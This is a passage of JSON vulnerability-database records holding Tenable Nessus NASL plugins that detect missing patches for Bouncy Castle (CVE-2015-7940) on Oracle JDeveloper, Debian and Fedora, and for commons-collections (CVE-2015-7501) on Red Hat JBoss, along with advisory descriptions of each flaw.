"vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:06", "description": "The version of Oracle JDeveloper installed on the remote host is missing a security patch. Please see the vendor advisory for additional information.", "cvss3": {}, "published": "2018-07-25T00:00:00", "type": "nessus", "title": "Oracle JDeveloper Information Disclosure Vulnerability (July 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:jdeveloper"], "id": "ORACLE_JDEVELOPER_CPU_JUL_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/111332", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111332);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n script_bugtraq_id(79091);\n\n script_name(english:\"Oracle JDeveloper Information Disclosure Vulnerability (July 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software development application installed on the remote host is\naffected by an information disclosure vulnerability within the Bouncy\nCastle Java package\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle JDeveloper installed on the remote host is\nmissing a security patch. Please see the vendor advisory for \nadditional information.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60bcb092\");\n # https://support.oracle.com/rs?type=doc&id=2394520.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19cc26a6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7940\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdeveloper\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_jdeveloper_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle JDeveloper\");\n\n exit(0);\n}\n\ninclude('vcf_extras_oracle.inc');\n\nvar app_info = vcf::oracle_jdev::get_app_info();\n\nvar constraints = [\n { 'min_version':'12.1.3.0', 'fixed_version':'12.1.3.0.180525', 'missing_patch':'27800100' },\n { 'min_version':'12.2.1.2', 'fixed_version':'12.2.1.2.180525', 'missing_patch':'27783350' },\n { 'min_version':'12.2.1.3', 'fixed_version':'12.2.1.3.180607', 'missing_patch':'28151020' }\n # Note: 27957723 appears to be the original patch for 12.2.1.3, but is no longer listed\n];\n\nvcf::oracle_jdev::check_version_and_report(\n app_info:app_info,\n severity:SECURITY_WARNING,\n constraints:constraints\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:18:40", "description": "The Bouncy Castle Java library before 1.51 does not validate that a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an 'invalid curve attack.'\n\nFor Debian 6 'Squeeze', this issue has been fixed in version 1.44+dfsg-2+deb6u1 of bouncycastle.\n\nMany thanks to upstream author Peter Dettmann who reviewed the backport that we prepared.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-12-09T00:00:00", "type": "nessus", "title": "Debian DLA-361-1 : bouncycastle security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libbcmail-java", "p-cpe:/a:debian:debian_linux:libbcmail-java-doc", "p-cpe:/a:debian:debian_linux:libbcmail-java-gcj", "p-cpe:/a:debian:debian_linux:libbcpg-java", "p-cpe:/a:debian:debian_linux:libbcpg-java-doc", "p-cpe:/a:debian:debian_linux:libbcpg-java-gcj", "p-cpe:/a:debian:debian_linux:libbcprov-java", "p-cpe:/a:debian:debian_linux:libbcprov-java-doc", "p-cpe:/a:debian:debian_linux:libbcprov-java-gcj", "p-cpe:/a:debian:debian_linux:libbctsp-java", "p-cpe:/a:debian:debian_linux:libbctsp-java-doc", "p-cpe:/a:debian:debian_linux:libbctsp-java-gcj", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-361.NASL", "href": "https://www.tenable.com/plugins/nessus/87266", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-361-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87266);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n\n script_name(english:\"Debian DLA-361-1 : bouncycastle security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Bouncy Castle Java library before 1.51 does not validate that a\npoint is within the elliptic curve, which makes it easier for remote\nattackers to obtain private keys via a series of crafted elliptic\ncurve Diffie Hellman (ECDH) key exchanges, aka an 'invalid curve\nattack.'\n\nFor Debian 6 'Squeeze', this issue has been fixed in\nversion 1.44+dfsg-2+deb6u1 of bouncycastle.\n\nMany thanks to upstream author Peter Dettmann who reviewed the\nbackport that we prepared.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/12/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/bouncycastle\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcmail-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcmail-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcmail-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcpg-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcpg-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcpg-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcprov-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcprov-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcprov-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbctsp-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbctsp-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbctsp-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libbcmail-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcmail-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcmail-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcpg-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcpg-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcpg-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcprov-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcprov-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcprov-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbctsp-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbctsp-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbctsp-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:18:33", "description": "Tibor Jager, Jorg Schwenk, and Juraj Somorovsky, from Horst Gortz Institute for IT Security, published a paper in ESORICS 2015 where they describe an invalid curve attack in Bouncy Castle Crypto, a Java library for cryptography. An attacker is able to recover private Elliptic Curve keys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-att acks.htmlPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf", "cvss3": {}, "published": "2015-12-15T00:00:00", "type": "nessus", "title": "Debian DSA-3417-1 : bouncycastle - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bouncycastle", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3417.NASL", "href": "https://www.tenable.com/plugins/nessus/87359", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3417. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87359);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n script_xref(name:\"DSA\", value:\"3417\");\n\n script_name(english:\"Debian DSA-3417-1 : bouncycastle - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tibor Jager, Jorg Schwenk, and Juraj Somorovsky, from Horst Gortz\nInstitute for IT Security, published a paper in ESORICS 2015 where\nthey describe an invalid curve attack in Bouncy Castle Crypto, a Java\nlibrary for cryptography. An attacker is able to recover private\nElliptic Curve keys from different applications, for example, TLS\nservers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-att\nacks.htmlPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802671\"\n );\n # http://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?577fd981\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://euklid.org/pdf/ECC_Invalid_Curve.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/bouncycastle\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/bouncycastle\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3417\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bouncycastle packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libbcmail-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcmail-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcmail-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcpg-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcpg-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcpg-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcprov-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcprov-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcprov-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbctsp-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbctsp-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbctsp-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcmail-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcmail-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpg-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpg-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpkix-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpkix-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcprov-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcprov-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:23", "description": "Security fix for CVE-2015-7940\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : bouncycastle-1.50-8.fc22 (2015-7d95466eda)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bouncycastle", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-7D95466EDA.NASL", "href": "https://www.tenable.com/plugins/nessus/89298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-7d95466eda.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89298);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n script_xref(name:\"FEDORA\", value:\"2015-7d95466eda\");\n\n script_name(english:\"Fedora 22 : bouncycastle-1.50-8.fc22 (2015-7d95466eda)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7940\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1276272\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-January/174915.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?98f40c66\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"bouncycastle-1.50-8.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:49", "description": "Updated packages for the Apache commons-collections library for Red Hat JBoss Enterprise Application Platform 6.4, which fix one security issue, are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.4 on Red Hat Enterprise Linux 5, 6, and 7 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-11-24T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2500)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2015-2500.NASL", "href": "https://www.tenable.com/plugins/nessus/87044", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2500. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87044);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2500\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2500)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages for the Apache commons-collections library for Red\nHat JBoss Enterprise Application Platform 6.4, which fix one security\nissue, are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.4 on Red\nHat Enterprise Linux 5, 6, and 7 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections-eap6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n 